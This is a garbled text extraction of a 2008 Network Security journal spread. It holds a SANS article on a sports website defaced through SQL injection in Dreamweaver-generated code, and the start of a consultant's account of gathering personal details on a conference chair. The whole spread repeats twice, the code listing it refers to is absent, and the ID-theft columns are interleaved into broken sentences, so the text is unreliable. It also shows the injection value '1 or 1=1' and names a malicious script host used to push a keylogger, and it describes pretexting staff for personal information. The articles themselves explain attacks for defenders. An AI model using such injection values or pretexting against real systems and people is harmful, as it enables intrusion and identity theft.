- Email: [email protected]
Defacing websites via SQL injection
SQL INJECTION
Defacing websites via SQL injection Johannes B. Ullrich, chief research officer, SANS Technology Institute Jason Lam, instructor, SANS Institute. In early February 2007, security communities became aware of a major sports event website distributing malware.1 It infected visitors through a well-known technique at the time, which was a VML exploit targeting Internet Explorer browsers. Any visitors running Internet Explorer without the VML patch could be infected with the trojan. Upon investigation of the web page, a HTML script directive was found, linking to a script on a Chinese website. A large legitimate organisation like this obviously had no interest in infecting its visitors with trojans, so what went wrong here?
‘Page title, tables, checkboxes and essentially anything on the page can be generated by using information from the data repository’ Increasing numbers of websites create page content on the fly from a SQL database. Page title, tables, checkboxes and essentially anything on the page can be generated by using information from the data repository. This idea of creating a page template and generating pages based on data in the database is like a dream come true for the development community. On the flip side, if the developer of the template is not careful, SQL injection can become a serious problem. The sports website exploit was the most visible in a string of attacks performed by the same group of hackers. Logs recovered from other compromised sites indicated that this particular group of hackers frequently exploited a particular SQL injection vulnerability in Dreamweaver-generated code.2 The vulnerability, found in code generated with versions of the software before 8.0.2, allowed attackers to insert SQL injection exploits. Interestingly, code generated by Dreamweaver for diverse platforms like PHP, ASP and JSP suffered from the same vulnerability. The content of the variable $colname_rs_ byDate is not sufficiently validated before
January 2008
being used in the SQL statement in lines 68. Line 3 attempts to validate the content of the variable, but does so insufficiently. PHP offers a ‘magic_quotes’ option, which will automatically escape all parameters submitted by the users. However, this option is not always enabled. The code above attempts to deal with this condition by verifying if the magic_quotes option is enabled. If it is enabled, no validation is performed. Special characters are escaped using the addslashes function. Addslashes will add a slash in front of every single quote, double quote and slash. The magic_quotes option will do the same thing if enabled. An example for a query where addslashes is not sufficient is: Select a from x where b=$var No quotes are used, and a value of $var like “1 or 1=1” would result in a valid SQL query.
SQL injection typically allows the attacker to formulate arbitrary SQL queries, which will be executed with the permission of the web server. Sadly, many system administrators are not careful enough to restrict the permissions of the web server. This can lead to a number of dangerous exploits. In the example discussed here, the attacker may use SQL injection to modify the content of the database, which will then be used to create web content. In effect this leads to a defacement of the site. However, in this case, the defacement was not obvious to a casual visitor of the site. Only a single line of Javascript was added. This line included the javascript “3.js” from dv521.com. When 3.js is loaded, it redirects the user to an iframe that links to the actual exploit. Exploits like this can go undetected for a long time as they are not visible to the user. This particular script and various versions of it were found on numerous well-maintained web sites, and their reliance on Dreamweaver-generated code made them vulnerable. Without hostor network-based intrusion detection, the exploit may go undetected for a while. The site was defaced at least twice. After the
Listing 1: Here is a code sample from Adobe’s advisory.
Network Security
9
SQL INJECTION first defacement, the vulnerability was not immediately identified and an additional defacement was performed. If a vulnerable version of Internet Explorer is used to access the page, the exploit is able to install a downloader script which in turn causes a keystroke logger to be installed. The keystroke logger used in early 2007 specialised in finding World of Warcraft passwords. These passwords were then forwarded to Chinese ’gold farmers‘ who sold these credentials or items the account holder owned within the game to unsuspecting online gamers.
Resources • ‘SQL Injection’, OWASP • ‘PHP Magic Quotes’, PHP Onine Manual, http://us.php.net/magic_quotes • ‘American Football Championship Shenanigans’, Internet Storm Center, February 2007 • ‘Dreamweaver Server Behavior SQL Injection vulnerability, Adobe Security
Bulletins, May 2006 • ‘Protecting PHP server behaviors from SQL injection vulnerability’, Adobe Knowledgebase, June 2007
References 1. ‘Malicious website: Super Bowl XLI/ Dolphin Stadium’, Websense, February 2007 2. ‘Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code’, SecurityFocus, May 2006
About the authors Research Officer for the SANS Institute, Johannes Ullrich is currently responsible for the SANS Internet Storm Center (ISC) and the GIAC Gold program. He founded
DShield.org in 2000, which is now the data collection engine behind the ISC. His work with the ISC has been widely recognised, and in 2004, Network World named him one of the 50 most powerful people in the networking industry. Prior to working for SANS, Johannes worked as a lead support engineer for a web development company and as a research physicist. Johannes holds a Ph.D. in physics from SUNY Albany and is located in Jacksonville FL. Jason Lam is an author and instructor with the SANS Institute. His recent courseware development projects include Web application security workshop, Intro to testing web applications, and AJAX and Web services security overview. Jason started his career as a programmer before moving on to ISP network administration where he handled network security incidents, which sparked his interest in infosec work. Jason specialises in network perimeter protection, penetration testing and intrusion detection. He currently holds a B.A. in Computer Science from York University in Toronto, Ontario as well as CISSP, GCIA, GCFW, GCUX, GCWN, GCIH.
ID theft for beginners Nollaig Dunne, security technical security consultant, IRM plc. I attended a fraud forum ran by one of the credit reference agencies a number of months ago. There were may people in attendance from various financial houses, government departments and crime agencies making the usual pleasantries. Selfishly, I wanted a plug for IRM, so I did some digging on the senior director who was chairing the day’s lectures. Very quickly with the help of my colleagues His employees were more than happy to back in the office, I was able to access pubgive me specifics on the family, what he licly available information on this particular liked doing at weekends, how his kids chap. We were able to draw up informal played tennis, and so on. It was simple curriculum vitae for him, detailing where and I could have gone a lot further. he had worked, when he had worked there, “Because I already knew and what his role had been. However, this only served to whet the appetite. something about this man, During the lunch interval I approached I appeared to be legitimate, members of the individual’s staff. Using which made it easier to the information gleaned, I asked how extend what I knew” long they had known him, and then Given that I was speaking with fraud began politely probing into his backexperts at an event organised to publicise ground. Even after years working as an the safety of personal information, how expert in identity theft, I am always could this have been possible? In practice, impressed at how much information people will willingly give out about others. it was relatively easy. Simply using 10
Network Security
freely-available information about an individual can improve an investigator’s credibility. Because I already knew something about this man, I appeared to be legitimate, which made it easier to extend what I knew. Feeling pretty pleased with my efforts I put together a rather scribbled one-pager and handed it over to this managing director before the afternoon’s lectures started. Sadly I didn’t get my plug. He didn’t want to be embarrassed, after all.
More than an embarassment But for most people, embarrassment is the least worrying aspect of having your identity compromised. Committing ID theft has never been easier. Public awareness of this issue has never been higher, thanks to recent high-profile cases publicised in the press. The loss of child benefit data on 25 million people by Her Majesty’s Revenue and Customs is a prime example.
January 2008
Defacing websites via SQL injection Johannes B. Ullrich, chief research officer, SANS Technology Institute Jason Lam, instructor, SANS Institute. In early February 2007, security communities became aware of a major sports event website distributing malware.1 It infected visitors through a well-known technique at the time, which was a VML exploit targeting Internet Explorer browsers. Any visitors running Internet Explorer without the VML patch could be infected with the trojan. Upon investigation of the web page, a HTML script directive was found, linking to a script on a Chinese website. A large legitimate organisation like this obviously had no interest in infecting its visitors with trojans, so what went wrong here?
‘Page title, tables, checkboxes and essentially anything on the page can be generated by using information from the data repository’ Increasing numbers of websites create page content on the fly from a SQL database. Page title, tables, checkboxes and essentially anything on the page can be generated by using information from the data repository. This idea of creating a page template and generating pages based on data in the database is like a dream come true for the development community. On the flip side, if the developer of the template is not careful, SQL injection can become a serious problem. The sports website exploit was the most visible in a string of attacks performed by the same group of hackers. Logs recovered from other compromised sites indicated that this particular group of hackers frequently exploited a particular SQL injection vulnerability in Dreamweaver-generated code.2 The vulnerability, found in code generated with versions of the software before 8.0.2, allowed attackers to insert SQL injection exploits. Interestingly, code generated by Dreamweaver for diverse platforms like PHP, ASP and JSP suffered from the same vulnerability. The content of the variable $colname_rs_ byDate is not sufficiently validated before
January 2008
being used in the SQL statement in lines 68. Line 3 attempts to validate the content of the variable, but does so insufficiently. PHP offers a ‘magic_quotes’ option, which will automatically escape all parameters submitted by the users. However, this option is not always enabled. The code above attempts to deal with this condition by verifying if the magic_quotes option is enabled. If it is enabled, no validation is performed. Special characters are escaped using the addslashes function. Addslashes will add a slash in front of every single quote, double quote and slash. The magic_quotes option will do the same thing if enabled. An example for a query where addslashes is not sufficient is: Select a from x where b=$var No quotes are used, and a value of $var like “1 or 1=1” would result in a valid SQL query.
SQL injection typically allows the attacker to formulate arbitrary SQL queries, which will be executed with the permission of the web server. Sadly, many system administrators are not careful enough to restrict the permissions of the web server. This can lead to a number of dangerous exploits. In the example discussed here, the attacker may use SQL injection to modify the content of the database, which will then be used to create web content. In effect this leads to a defacement of the site. However, in this case, the defacement was not obvious to a casual visitor of the site. Only a single line of Javascript was added. This line included the javascript “3.js” from dv521.com. When 3.js is loaded, it redirects the user to an iframe that links to the actual exploit. Exploits like this can go undetected for a long time as they are not visible to the user. This particular script and various versions of it were found on numerous well-maintained web sites, and their reliance on Dreamweaver-generated code made them vulnerable. Without hostor network-based intrusion detection, the exploit may go undetected for a while. The site was defaced at least twice. After the
Listing 1: Here is a code sample from Adobe’s advisory.
Network Security
9
SQL INJECTION first defacement, the vulnerability was not immediately identified and an additional defacement was performed. If a vulnerable version of Internet Explorer is used to access the page, the exploit is able to install a downloader script which in turn causes a keystroke logger to be installed. The keystroke logger used in early 2007 specialised in finding World of Warcraft passwords. These passwords were then forwarded to Chinese ’gold farmers‘ who sold these credentials or items the account holder owned within the game to unsuspecting online gamers.
Resources • ‘SQL Injection’, OWASP
Bulletins, May 2006
References 1. ‘Malicious website: Super Bowl XLI/ Dolphin Stadium’, Websense, February 2007
About the authors Research Officer for the SANS Institute, Johannes Ullrich is currently responsible for the SANS Internet Storm Center (ISC) and the GIAC Gold program. He founded
DShield.org in 2000, which is now the data collection engine behind the ISC. His work with the ISC has been widely recognised, and in 2004, Network World named him one of the 50 most powerful people in the networking industry. Prior to working for SANS, Johannes worked as a lead support engineer for a web development company and as a research physicist. Johannes holds a Ph.D. in physics from SUNY Albany and is located in Jacksonville FL. Jason Lam is an author and instructor with the SANS Institute. His recent courseware development projects include Web application security workshop, Intro to testing web applications, and AJAX and Web services security overview. Jason started his career as a programmer before moving on to ISP network administration where he handled network security incidents, which sparked his interest in infosec work. Jason specialises in network perimeter protection, penetration testing and intrusion detection. He currently holds a B.A. in Computer Science from York University in Toronto, Ontario as well as CISSP, GCIA, GCFW, GCUX, GCWN, GCIH.
ID theft for beginners Nollaig Dunne, security technical security consultant, IRM plc. I attended a fraud forum ran by one of the credit reference agencies a number of months ago. There were may people in attendance from various financial houses, government departments and crime agencies making the usual pleasantries. Selfishly, I wanted a plug for IRM, so I did some digging on the senior director who was chairing the day’s lectures. Very quickly with the help of my colleagues His employees were more than happy to back in the office, I was able to access pubgive me specifics on the family, what he licly available information on this particular liked doing at weekends, how his kids chap. We were able to draw up informal played tennis, and so on. It was simple curriculum vitae for him, detailing where and I could have gone a lot further. he had worked, when he had worked there, “Because I already knew and what his role had been. However, this only served to whet the appetite. something about this man, During the lunch interval I approached I appeared to be legitimate, members of the individual’s staff. Using which made it easier to the information gleaned, I asked how extend what I knew” long they had known him, and then Given that I was speaking with fraud began politely probing into his backexperts at an event organised to publicise ground. Even after years working as an the safety of personal information, how expert in identity theft, I am always could this have been possible? In practice, impressed at how much information people will willingly give out about others. it was relatively easy. Simply using 10
Network Security
freely-available information about an individual can improve an investigator’s credibility. Because I already knew something about this man, I appeared to be legitimate, which made it easier to extend what I knew. Feeling pretty pleased with my efforts I put together a rather scribbled one-pager and handed it over to this managing director before the afternoon’s lectures started. Sadly I didn’t get my plug. He didn’t want to be embarrassed, after all.
More than an embarassment But for most people, embarrassment is the least worrying aspect of having your identity compromised. Committing ID theft has never been easier. Public awareness of this issue has never been higher, thanks to recent high-profile cases publicised in the press. The loss of child benefit data on 25 million people by Her Majesty’s Revenue and Customs is a prime example.
January 2008